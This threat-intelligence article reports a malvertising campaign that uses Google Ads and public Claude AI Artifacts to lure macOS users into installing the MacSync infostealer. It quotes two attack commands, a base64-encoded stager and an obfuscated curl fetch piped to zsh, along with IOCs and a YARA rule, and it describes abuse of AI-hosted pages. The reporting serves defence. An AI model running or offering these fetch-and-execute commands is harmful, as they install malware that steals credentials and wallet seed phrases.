Malware 2026-02-15

Malicious Campaign Uses Claude AI Artifacts and Google Ads to Deliver MacSync Infostealer

A sophisticated malvertising campaign abuses Google Ads and public Claude AI Artifacts to trick macOS users into executing terminal commands that install the MacSync infostealer, targeting credentials and hardware crypto wallets.

malvertisingmacosinfostealergoogle-adsAI abusesocial engineering
Malicious Campaign Uses Claude AI Artifacts and Google Ads to Deliver MacSync Infostealer
Advertisement

A newly discovered malvertising campaign is leveraging Google Ads and public Claude AI Artifacts to distribute the MacSync infostealer targeting macOS users. The campaign exploits the inherent trust users place in domains like claude.ai and medium.com to bypass security awareness.

Attack Chain

The attack follows a multi-stage delivery workflow:

  1. Google Ads Lure - Attackers purchase sponsored search results for common queries like "Homebrew install," "DNS resolver," or "macOS disk analyzer"
  2. Trusted Domain Redirect - Ads direct victims to public Claude Artifacts or Medium/Evernote pages titled "macOS Secure Command Execution" or similar
  3. ClickFix Social Engineering - The page provides a convincing technical guide instructing users to paste a command into Terminal
  4. Payload Execution - The command downloads and executes the MacSync infostealer

Technical Details

The campaign uses two primary command variants to deliver the payload:

Variant 1: Base64 Encoded Stager

The first variant uses base64 encoding to decode a Zsh stager that fetches a remote AppleScript core:

TERMINAL_CODE
echo "Y3VybCAtayAtcyAtLU1heC1UaW1lIDMwIC1IICJBcGktS2V5OiA1MTkwZWYxNzMzMT..." | base64 -D | zsh

Variant 2: Obfuscated Curl

The second variant uses string concatenation to evade YARA and pattern-matching detection:

TERMINAL_CODE
true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[token]" | zsh

Crypto Wallet Targeting

If MacSync detects Ledger or Trezor wallet applications, it overwrites the internal app.asar bundle with a trojanized version designed to phish for seed phrases. The malware uses ad-hoc code re-signing to bypass basic Gatekeeper checks.

Indicators of Compromise (IOCs)

TypeValueDescription
C2 Domaina2abotnet[.]comPrimary C2 and exfiltration gate
Payload Hostraxelpak[.]comHosts malicious loaders
Payload Hostjmpbowl[.]xyzAppleScript payload hosting
Staging Path/tmp/osalogging.zipStolen data staging archive
SHA-256ec6bc84be18ce4cb55fb915370c00f2a836ffefc65c6b728efb8d2d28036e376Trojanized Ledger app.asar
SHA-256c99dea85f0ef8d3e2f3771c8ebd02d7dee0d90efc5c8392e5c266a59640a4206Modified Info.plist

YARA Detection Rule

TERMINAL_CODE
rule MacSync_Detection {
    meta:
        description = "Detects MacSync infostealer and staging artifacts"
        author = "Security Research"
        date = "2026-02-14"
    strings:
        $s1 = "osalogging.zip" ascii
        $s2 = "a2abotnet.com" ascii
        $s3 = "GrabFolderLimit" ascii
        $s4 = "checkvalid" ascii
        $phish = "Enter your system password to continue verification" ascii
    condition:
        2 of ($s*) or $phish
}

Mitigation

  • Never trust terminal commands from public AI artifacts, Medium posts, or sponsored search results
  • Block a2abotnet[.]com, raxelpak[.]com, and jmpbowl[.*] domains at the network level
  • Monitor for unexpected osascript or curl | zsh execution chains
  • Verify integrity of hardware wallet applications (Ledger, Trezor) if a suspicious command was executed
  • Note that Anthropic and Google may take 12-24 hours to remediate reported malicious links
Advertisement

Tags

#MALVERTISING#MACOS#INFOSTEALER#GOOGLE-ADS#AI ABUSE#SOCIAL ENGINEERING
Disseminate_Intel: